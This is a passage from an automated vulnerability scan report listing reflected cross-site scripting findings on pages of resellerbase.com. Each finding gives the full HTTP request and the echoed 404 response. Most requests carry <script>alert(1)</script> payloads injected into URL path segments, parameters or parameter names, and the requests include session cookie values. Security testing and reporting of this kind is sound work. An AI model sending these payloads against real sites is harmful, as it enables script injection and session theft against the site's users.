Referer: http://www.resellerbase.com/detail/16/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1f834<script>alert(1)</script>ba55b2bcc29/16/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1372. http://www.resellerbase.com/detail/16/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload db7ba<script>alert(1)</script>a8e8962b85b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16db7ba<script>alert(1)</script>a8e8962b85b/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16db7ba<script>alert(1)</script>a8e8962b85b/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1373. http://www.resellerbase.com/detail/16/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 484bb<script>alert(1)</script>fa378a6a8c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes484bb<script>alert(1)</script>fa378a6a8c6/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes484bb<script>alert(1)</script>fa378a6a8c6/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1374. http://www.resellerbase.com/detail/16/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a010d<script>alert(1)</script>56e492b4b7d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/search.phpa010d<script>alert(1)</script>56e492b4b7d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/search.phpa010d<script>alert(1)</script>56e492b4b7d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1375. http://www.resellerbase.com/detail/16/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload fa9b2<a>6dc07b7a305 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/search.php?keyword=search...&Submit3=Searchfa9b2<a>6dc07b7a305&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/search.php?keyword=search...&Submit3=Searchfa9b2<a>6dc07b7a305&opt=2 was not found on this server.</p>
...[SNIP]...

2.1376. http://www.resellerbase.com/detail/16/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 23cb4<a>de4be190f33 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/search.php?keyword=search...23cb4<a>de4be190f33&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/search.php?keyword=search...23cb4<a>de4be190f33&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1377. http://www.resellerbase.com/detail/16/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5247f<script>alert(1)</script>296819c65a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/search.php?keyword=search...&Submit3=Search&opt=2&5247f<script>alert(1)</script>296819c65a7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/search.php?keyword=search...&Submit3=Search&opt=2&5247f<script>alert(1)</script>296819c65a7=1 was not found on this server.</p>
...[SNIP]...

2.1378. http://www.resellerbase.com/detail/16/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 89f65<a>ffb731e7082 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/search.php?keyword=search...&Submit3=Search&opt=289f65<a>ffb731e7082 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/search.php?keyword=search...&Submit3=Search&opt=289f65<a>ffb731e7082 was not found on this server.</p>
...[SNIP]...

2.1379. http://www.resellerbase.com/detail/16/worldkom-net.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/worldkom-net.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eaa9f<script>alert(1)</script>9b8335eace6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaileaa9f<script>alert(1)</script>9b8335eace6/16/worldkom-net.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaileaa9f<script>alert(1)</script>9b8335eace6/16/worldkom-net.html was not found on this server.</p>
...[SNIP]...

2.1380. http://www.resellerbase.com/detail/16/worldkom-net.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/16/worldkom-net.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 53aca<a>c3cfe8f720d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/1653aca<a>c3cfe8f720d/worldkom-net.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1653aca<a>c3cfe8f720d/worldkom-net.html was not found on this server.</p>
...[SNIP]...

2.1381. http://www.resellerbase.com/detail/16/worldkom-net.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/worldkom-net.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68b4c<script>alert(1)</script>d3ea630e3e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/68b4c<script>alert(1)</script>d3ea630e3e9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/68b4c<script>alert(1)</script>d3ea630e3e9 was not found on this server.</p>
...[SNIP]...

2.1382. http://www.resellerbase.com/detail/17/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 255a8<script>alert(1)</script>3226e67af9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail255a8<script>alert(1)</script>3226e67af9d/17/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail255a8<script>alert(1)</script>3226e67af9d/17/ was not found on this server.</p>
...[SNIP]...

2.1383. http://www.resellerbase.com/detail/17/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 235c4<script>alert(1)</script>f12ea55b7d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17235c4<script>alert(1)</script>f12ea55b7d3/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17235c4<script>alert(1)</script>f12ea55b7d3/ was not found on this server.</p>
...[SNIP]...

2.1384. http://www.resellerbase.com/detail/17/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e44e0<script>alert(1)</script>97a44163409 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/?e44e0<script>alert(1)</script>97a44163409=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

2.1385. http://www.resellerbase.com/detail/17/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3de53<script>alert(1)</script>33bf19beaa8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3de53<script>alert(1)</script>33bf19beaa8/17/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3de53<script>alert(1)</script>33bf19beaa8/17/rating.php was not found on this server.</p>
...[SNIP]...

2.1386. http://www.resellerbase.com/detail/17/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2e874<script>alert(1)</script>836d04761615000a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail2e874<script>alert(1)</script>836d04761615000a5/17/rating.php?id=17&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2e874<script>alert(1)</script>836d04761615000a5/17/rating.php?id=17&rating=5 was not found on this server.</p>
...[SNIP]...

2.1387. http://www.resellerbase.com/detail/17/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8953e<script>alert(1)</script>3ccf81f52f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/178953e<script>alert(1)</script>3ccf81f52f7/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/178953e<script>alert(1)</script>3ccf81f52f7/rating.php was not found on this server.</p>
...[SNIP]...

2.1388. http://www.resellerbase.com/detail/17/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cfe40<script>alert(1)</script>ad6bbaf0ef71fe3e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/17cfe40<script>alert(1)</script>ad6bbaf0ef71fe3e5/rating.php?id=17&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17cfe40<script>alert(1)</script>ad6bbaf0ef71fe3e5/rating.php?id=17&rating=5 was not found on this server.</p>
...[SNIP]...

2.1389. http://www.resellerbase.com/detail/17/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 81f3a<script>alert(1)</script>ce67c22d53013dd55 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/17/rating.php81f3a<script>alert(1)</script>ce67c22d53013dd55?id=17&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/rating.php81f3a<script>alert(1)</script>ce67c22d53013dd55?id=17&rating=5 was not found on this server.</p>
...[SNIP]...

2.1390. http://www.resellerbase.com/detail/17/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b4c7<script>alert(1)</script>445c91feaa5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/rating.php5b4c7<script>alert(1)</script>445c91feaa5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/rating.php5b4c7<script>alert(1)</script>445c91feaa5 was not found on this server.</p>
...[SNIP]...

